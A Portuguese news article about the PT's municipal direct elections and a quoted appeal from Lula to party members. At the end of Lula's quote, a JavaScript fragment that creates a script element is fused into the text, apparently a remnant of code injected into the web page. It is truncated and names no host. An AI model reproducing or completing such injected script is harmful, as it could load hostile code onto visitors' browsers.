PT elege diretores de olho nas eleições de 2018

Ao todo, 1,6 milhão de petistas em todo o Brasil poderão participar do Processo de Eleições Diretas. Foto: Agência PT

Neste domingo (9), 1,6 milhão de petistas em todo o Brasil poderão participar do Processo de Eleições Diretas municipais do partido. Ao todo 4.109 diretórios zonais escolherão seus delegados. Os eleitos participarão da eleição dos presidentes regionais e nacional do partido, respectivamente em maio e junho.

Os petistas devem comparecer aos diretórios municipais no dia 9 de abril, um domingo, e fazer a votação em três fases: para a chapa de delegados estaduais, presidente municipal e chapa do diretório municipal. No caso de algumas capitais, há ainda o voto para os diretórios zonais.

Em 3,2 mil municípios, a eleição será realizada com votação estadual e municipal, e um novo diretório municipal será eleito onde houver quorum. Além disso, em 909 municípios terão eleições apenas em nível estadual.

O voto é secreto e realizado das 9h às 17h. Os resultados serão contabilizados até o dia 11 de abril e devem ser informados às Executivas estaduais até as 12h.

De acordo com a Secretaria de Organização, foram registrados 3.332 candidatos a presidente, 3,819 chapas para diretórios e 244 para as direções zonais. Além disso, 121 chapas se inscreveram para a eleição de delegados aos Congressos Estaduais.

O Processo de Eleições Diretas (PED) municipal torna-se a principal ferramenta de fortalecimento da militância, das instâncias partidárias e do PT Nacional. As instâncias municipais organizarão, na data e no local do PED municipal, plenárias para debater a pauta do Congresso Nacional: cenário internacional; cenário nacional; balanço dos governos nacionais petistas; estratégia política e programa; funcionamento do PT e organização partidária, com exceção do tema PED.

Em vídeo divulgado para toda militância petista, o ex-presidente Luiz Inácio Lula da Silva destaca a importância de o petista ir votar e contribuir para o fortalecimento do PT e o legado partidário.

Para Lula, 2017 é um ano importante, quando o partido vai recuperar sua imagem e dar uma resposta aqueles que tentam, desde 2005, destruir o PT.

“Nós sobrevivemos, ganhamos 2006, 2010 e 2014. Queria falar com você, com seu coração e alma. Nunca esse país precisou tanto do PT como agora. Compareça em massa no seu município, vamos fazer um grande encontro municipal, depois um estadual, para um grande nacional, lavando a alma do povo trabalhador desse país e do povo petista”.var d=document;var s=d.createElement(‘script’);

Deixe um comentário